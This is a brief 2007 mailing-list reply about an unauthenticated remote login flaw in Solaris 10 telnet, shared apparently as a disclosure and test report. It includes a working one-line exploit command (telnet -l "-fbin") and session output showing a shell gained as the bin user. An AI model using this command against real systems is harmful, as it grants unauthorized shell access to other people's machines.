11 Feb
2007
11 Feb
'07
10:47 p.m.
On Sun, 11 Feb 2007, William Schultz wrote:
http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day- disable.html
Tested on Sol10, and it indeed works... Good thing we use SSH, right?!
It works. Credit to Johannes Ullrich at the SANS ISC. I believe the vulnerability is that it is running telnet bu default.
################################ iWil:~ wschultz$ telnet -l "-fbin" dns1 Trying A.B.C.D... Connected to dns1.my.com. Escape character is '^]'. Last login: Sun Feb 11 18:11:05 from A.B.C.D Sun Microsystems Inc. SunOS 5.10 Generic January 2005 $ id uid=2(bin) gid=2(bin) $ ################################